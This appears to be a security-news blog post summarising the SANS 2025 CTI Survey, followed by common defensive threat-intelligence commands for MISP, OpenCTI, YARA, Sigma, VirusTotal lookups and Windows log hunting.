SANS 2025 CTI Survey: Navigating Uncertainty in Today’s Threat Landscape

By /

Listen to this Post

Featured Image
The SANS Institute has released its annual survey report, “SANS 2025 CTI Survey: Navigating Uncertainty in Today’s Threat Landscape”, available for download here. This report provides critical insights into the current state of Cyber Threat Intelligence (CTI) practices across organizations.

Key Findings:

  • 93% of organizations maintain some form of in-house CTI capability.
  • Intelligence requirements are the most formalized (44%), followed by collection planning (41%) and threat modeling (37%).
  • Threat landscape reports are the primary deliverable for CTI teams.
  • Direct feedback through meetings is the primary measure of CTI effectiveness, indicating a need for more quantifiable metrics.
  • AI adoption is growing, with collection being the leading phase where AI is applied.

You Should Know:

Essential CTI Tools & Commands

To implement effective CTI, security teams rely on various tools and frameworks. Below are key commands and techniques:

1. Threat Intelligence Collection

  • MISP (Malware Information Sharing Platform)
    sudo apt-get install misp-core  Debian/Ubuntu 
sudo systemctl start misp-workers
  • OpenCTI (Threat Intelligence Platform)
    docker-compose -f docker-compose.yml up -d

2. Automating Threat Feeds

  • Fetching Threat Feeds with Python
    import requests 
feed_url = "https://otx.alienvault.com/api/v1/pulses/subscribed" 
headers = {"X-OTX-API-KEY": "your_api_key"} 
response = requests.get(feed_url, headers=headers) 
print(response.json())

3. Analyzing IOCs (Indicators of Compromise)

  • YARA Rule Scanning
    yara -r rules.yar /malware/samples
  • Sigma for SIEM Detection
    sigma convert -t splunk -o output.splunk sigma_rule.yml

4. AI-Powered Threat Detection

  • Using VirusTotal API
    curl --request GET --url "https://www.virustotal.com/api/v3/files/{hash}" --header "x-apikey: YOUR_API_KEY"

5. Windows Threat Hunting

  • PowerShell Log Analysis
    Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" | Where-Object {$_.ID -eq 4104}
  • Sysmon for Advanced Monitoring
    sysmon -accepteula -i sysmonconfig-export.xml

What Undercode Say

The SANS 2025 CTI Survey highlights the growing importance of structured threat intelligence, yet organizations still struggle with funding and measurable ROI. Automation (via AI and scripting) is critical for scaling CTI operations. Teams should focus on integrating threat feeds, automating IOC analysis, and adopting AI-driven detection to stay ahead of adversaries.

Prediction

By 2026, AI-driven threat intelligence will dominate CTI workflows, reducing reliance on manual analysis and improving real-time threat response.

Expected Output:

  • Threat intelligence reports (MISP, OpenCTI)
  • Automated IOC detection (YARA, Sigma)
  • AI-enhanced threat hunting (VirusTotal, Splunk)
  • Windows/Linux forensic commands (Sysmon, PowerShell, YARA)

For the full report, download it from SANS Institute.

References:

Reported By: Mthomasson The – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram

Related Posts: